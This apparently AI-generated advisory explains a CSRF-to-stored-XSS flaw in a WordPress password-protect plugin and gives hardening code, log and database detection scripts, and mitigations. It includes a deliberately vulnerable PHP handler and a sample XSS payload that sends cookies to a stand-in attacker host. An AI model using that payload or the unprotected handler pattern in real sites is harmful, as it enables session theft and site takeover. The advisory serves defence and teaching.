CVE-2025-23435 Overview
CVE-2025-23435 is a Cross-Site Request Forgery (CSRF) vulnerability in the marcucci Password Protect Plugin for WordPress that chains into Stored Cross-Site Scripting (XSS). The flaw affects all plugin versions up to and including 0.8.1.0. The attacker needs no account on the target site: by luring an authenticated administrator to a crafted page, the attacker can make the administrator's browser submit forged requests that persist malicious JavaScript into plugin-managed content. The injected script later executes in the browsers of site visitors and administrators. The issue is classified as CWE-352 and was published to NVD on January 16, 2025.
Critical Impact
Successful exploitation chains CSRF with Stored XSS, enabling session hijacking, administrative account takeover, and persistent malicious payload delivery to WordPress site visitors.
Affected Products
- marcucci Password Protect Plugin for WordPress versions through 0.8.1.0
- WordPress installations with the password-protect-plugin-for-wordpress plugin enabled
- Any such site whose administrators browse untrusted external content while logged in, which is the precondition for the CSRF trigger
Discovery Timeline
- 2025-01-16 - CVE-2025-23435 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-23435
Vulnerability Analysis
The Password Protect Plugin for WordPress fails to validate request authenticity on state-changing operations. WordPress provides a nonce mechanism for this: wp_nonce_field() emits the token into a form, and check_admin_referer(), check_ajax_referer() or wp_verify_nonce() verifies it. The nonce ties a request to a specific action, the current user's session and a limited time window, so a form served by another origin cannot supply a valid one. The vulnerable plugin omits or incorrectly verifies these tokens on configuration handlers exposed to administrators.
The defect allows a remote attacker to forge HTTP requests that the victim's browser submits with the victim's authenticated cookies. Because the plugin also fails to sanitize the stored input and to escape it on output, attacker-controlled JavaScript persists in the database and is written into the DOM each time the affected page is rendered, producing Stored XSS. The compound flaw elevates a one-click social engineering trigger into persistent site-wide script execution.
Root Cause
The root cause is missing CSRF token validation on plugin administrative endpoints, combined with insufficient output encoding of stored values. WordPress does not verify nonces automatically for admin_post_* and admin-ajax.php action handlers; each handler must call check_admin_referer() or check_ajax_referer() itself, and the affected versions do not do so consistently. A nonce check is also not an authorization check: a handler still needs a current_user_can() capability test, because a nonce only proves that the request came from a form the site issued to that user.
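The following PHP is an added illustration of the handler pattern described above and of its hardened form; it is not the plugin's own code, which the advisory does not reproduce. The hook name ppp_save_message, the option ppp_protected_message, the nonce field ppp_nonce and the form field names are hypothetical. The vulnerable handler trusts any request that arrives with an administrator's cookies and stores the value verbatim; the hardened one checks capability, verifies the nonce, sanitizes on input and escapes on output.

```php
<?php
// Added illustration of the CWE-352 handler pattern and its hardened form.
// This is NOT the plugin's code: the hook name ppp_save_message, the option
// ppp_protected_message and the form field names are hypothetical.

// ---- Vulnerable pattern: no nonce, no capability check, no sanitization ----
// (would be registered exactly like the fixed handler below)
function ppp_save_message_vulnerable() {
    // Any logged-in user's browser that posts here is trusted, so a page the
    // admin merely visits can auto-submit this request (CSRF).
    update_option( 'ppp_protected_message', $_POST['message'] ); // stored verbatim
    wp_safe_redirect( admin_url( 'options-general.php?page=ppp' ) );
    exit;
}

// Rendering the stored value unescaped turns the CSRF into stored XSS.
function ppp_render_message_vulnerable() {
    echo '<div class="ppp-message">' . get_option( 'ppp_protected_message' ) . '</div>';
}

// ---- Hardened pattern ----
function ppp_settings_form_fixed() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    // Emits a hidden nonce field named ppp_nonce plus the _wp_http_referer field.
    wp_nonce_field( 'ppp_save_message', 'ppp_nonce' );
    echo '<input type="hidden" name="action" value="ppp_save_message">';
    echo '<input type="text" name="message" value="'
        . esc_attr( get_option( 'ppp_protected_message', '' ) ) . '">';
    submit_button();
    echo '</form>';
}

add_action( 'admin_post_ppp_save_message', 'ppp_save_message_fixed' );
function ppp_save_message_fixed() {
    // 1. Authorization: only users allowed to change options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // 2. Request authenticity: the nonce is tied to this action, this user's
    //    session and a time window, so a cross-site form cannot supply a valid
    //    one. check_admin_referer() calls wp_die() when verification fails.
    check_admin_referer( 'ppp_save_message', 'ppp_nonce' );

    // 3. Sanitize before storage (wp_kses_post() instead if limited HTML is intended).
    $message = isset( $_POST['message'] )
        ? sanitize_text_field( wp_unslash( $_POST['message'] ) )
        : '';
    update_option( 'ppp_protected_message', $message );

    wp_safe_redirect( admin_url( 'options-general.php?page=ppp' ) );
    exit;
}

// 4. Escape on output regardless of what the database holds.
function ppp_render_message_fixed() {
    echo '<div class="ppp-message">' . esc_html( get_option( 'ppp_protected_message', '' ) ) . '</div>';
}
```

For admin-ajax.php handlers the equivalent verification call is check_ajax_referer(); REST API routes should instead rely on a permission_callback together with the X-WP-Nonce header that WordPress sends for authenticated requests. Output escaping (step 4) is what limits the damage even when a malicious value has already reached the database.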
Attack Vector
Exploitation requires user interaction, reflected by the UI:R component of the CVSS vector. An attacker hosts a malicious page containing an auto-submitting form or fetch request targeting the plugin's settings endpoint. When an authenticated WordPress administrator visits the page, the browser issues the forged request under the admin's session. The payload is stored and rendered to subsequent visitors, achieving a scope change (S:C) from the WordPress admin context to all site users.
The vulnerability mechanism is described in the Patchstack WordPress Vulnerability advisory. No public proof-of-concept code is currently available.
Detection Methods for CVE-2025-23435
Indicators of Compromise
- Unexpected <script> tags, event handlers, or obfuscated JavaScript stored in plugin configuration tables within the WordPress database.
- WordPress access logs showing POST requests to plugin admin endpoints (admin-post.php, admin-ajax.php) whose Referer or Origin header names an external, untrusted domain. A missing Referer is only a weak signal, since browsers and privacy extensions routinely strip it; where Sec-Fetch-Site is logged, a value of cross-site on such a POST is a stronger one.
- New or modified administrator accounts created shortly after an admin browsed external content.
- Outbound browser connections from site visitors to attacker-controlled domains following page loads.
Detection Strategies
- Audit the wp_options table and plugin-specific tables for HTML or JavaScript content where plain text is expected.
- Monitor for state-changing requests to password-protect-plugin-for-wordpress endpoints that lack a valid nonce. Web server access logs do not record POST bodies, so a _wpnonce parameter is only visible to a WAF or to application-level logging; and because the vulnerable versions never required the nonce, legitimate requests may lack it too. Treat a missing nonce as context, not proof.
- Deploy a Web Application Firewall (WAF) rule to flag POST requests to /wp-admin/ paths whose Origin or Referer host differs from the site, or whose Sec-Fetch-Site header is cross-site.
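The log and database checks above can be scripted. The PHP CLI script below is an added example, not part of the advisory or the plugin: it parses combined-format access log entries and flags POSTs to /wp-admin/ whose Referer is absent or from another host, and it scans option_name/option_value pairs (including serialized plugin settings) for script-like content. The site host example.com, the log lines and the option values are constructed samples; the option names are hypothetical.

```php
<?php
// Added example, not from the advisory or the plugin. The site host and all
// log lines / option values below are constructed samples.
// Run with: php detect-csrf-xss.php

const SITE_HOST = 'example.com'; // assumption: the host admins legitimately post from

// Parse one Apache/Nginx "combined" log line; null if it does not match.
function parse_combined( string $line ): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/';
    if ( ! preg_match( $re, $line, $m ) ) {
        return null;
    }
    return [ 'ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
             'path' => $m[4], 'status' => (int) $m[5], 'referer' => $m[6] ];
}

// Flag state-changing wp-admin requests whose Referer is absent or foreign.
// A missing Referer is a weak signal (browsers and privacy tools strip it), so
// it is reported at low severity; a foreign host is the real CSRF indicator.
function flag_cross_site_admin_posts( array $lines ): array {
    $hits = [];
    foreach ( $lines as $line ) {
        $r = parse_combined( $line );
        if ( ! $r || $r['method'] !== 'POST' || strpos( $r['path'], '/wp-admin/' ) !== 0 ) {
            continue;
        }
        $ref_host = ( $r['referer'] === '-' || $r['referer'] === '' )
            ? null : parse_url( $r['referer'], PHP_URL_HOST );
        if ( $ref_host === null ) {
            $hits[] = [ 'severity' => 'low', 'reason' => 'no Referer', 'line' => $line ];
        } elseif ( strcasecmp( $ref_host, SITE_HOST ) !== 0 ) {
            $hits[] = [ 'severity' => 'high', 'reason' => "Referer host $ref_host", 'line' => $line ];
        }
    }
    return $hits;
}

// Heuristic: markup that should never appear in a plain-text setting.
function looks_like_script( string $value ): bool {
    return (bool) preg_match( '/<\s*script\b|\bon[a-z]+\s*=|javascript\s*:|<\s*(iframe|svg|img)\b/i', $value );
}

// Scan option_name => option_value pairs as read from wp_options. Plugin
// settings are often stored serialized, so those are decoded and walked.
function scan_options( array $options ): array {
    $suspect = [];
    foreach ( $options as $name => $value ) {
        $decoded = is_string( $value ) ? @unserialize( $value, [ 'allowed_classes' => false ] ) : $value;
        $walk    = is_array( $decoded ) ? $decoded : [ $decoded === false ? $value : $decoded ];
        array_walk_recursive( $walk, function ( $v ) use ( &$suspect, $name ) {
            if ( is_string( $v ) && looks_like_script( $v ) ) {
                $suspect[] = $name;
            }
        } );
    }
    return array_values( array_unique( $suspect ) );
}

// ---- constructed samples ----
$log_lines = [
    '203.0.113.5 - - [20/Jan/2025:10:01:02 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 0 "https://example.com/wp-admin/options-general.php?page=ppp" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Jan/2025:10:07:44 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 0 "https://attacker.invalid/lure.html" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Jan/2025:10:08:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Jan/2025:10:09:00 +0000] "GET /wp-admin/ HTTP/1.1" 200 5120 "https://attacker.invalid/" "Mozilla/5.0"',
];
$options = [
    'blogname'              => 'Example Site',
    'ppp_settings'          => serialize( [ 'message' => 'Enter the password', 'css' => '' ] ),
    'ppp_protected_message' => 'Members only<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
];

foreach ( flag_cross_site_admin_posts( $log_lines ) as $h ) {
    printf( "[%s] %s: %s\n", strtoupper( $h['severity'] ), $h['reason'], $h['line'] );
}
foreach ( scan_options( $options ) as $name ) {
    echo "suspect option: $name\n";
}
```

On the samples, the second log line is reported at high severity (foreign Referer host), the third at low severity (no Referer), the first is silent because the Referer matches the site, and the GET is ignored; only ppp_protected_message is reported as a suspect option. The markup heuristic is deliberately broad, so review hits by hand rather than deleting values automatically, and feed the real wp_options rows in from a database export or WP-CLI rather than from literals.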
Monitoring Recommendations
- Enable WordPress audit logging to capture plugin setting changes and correlate with administrator session activity.
- Implement Content Security Policy (CSP) reporting to detect unexpected inline script execution on public pages.
- Track plugin version inventory across managed WordPress fleets to identify hosts running 0.8.1.0 or earlier.
How to Mitigate CVE-2025-23435
Immediate Actions Required
- Identify all WordPress sites running the Password Protect Plugin for WordPress at version 0.8.1.0 or earlier and prioritize remediation.
- Update the plugin to a version newer than 0.8.1.0 once the vendor publishes a fix; consult the Patchstack advisory for current status.
- Review plugin configuration values for injected scripts and remove any unauthorized content.
- Rotate administrator credentials and invalidate active sessions if compromise is suspected.
Patch Information
At the time of publication, Patchstack listed the affected range as "n/a through 0.8.1.0", that is, every release up to and including 0.8.1.0, with no fixed version identified. Administrators should monitor the WordPress plugin repository and the Patchstack database for an updated release. If no patched version is available, deactivate and remove the plugin until the vendor addresses the issue.
Workarounds
- Deactivate the Password Protect Plugin for WordPress until a patched version is installed.
- Restrict WordPress administrator access to dedicated browsers or sessions that do not browse arbitrary external content.
- Deploy a WAF rule that blocks cross-site POST requests to plugin administrative endpoints (Origin or Referer host not matching the site, or Sec-Fetch-Site: cross-site). A WAF cannot validate WordPress nonces, which are keyed to the site's secrets and the user's session, so this is a stop-gap rather than a substitute for the plugin fix.
- Enforce a Content Security Policy that disallows inline scripts to limit the impact of stored XSS payloads. WordPress core, themes and plugins emit inline scripts, so a policy without 'unsafe-inline' needs script nonces or hashes; roll it out in Content-Security-Policy-Report-Only mode first to find what breaks.
# Example: disable the plugin via WP-CLI pending a vendor fix
wp plugin deactivate password-protect-plugin-for-wordpress
wp plugin delete password-protect-plugin-for-wordpress
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.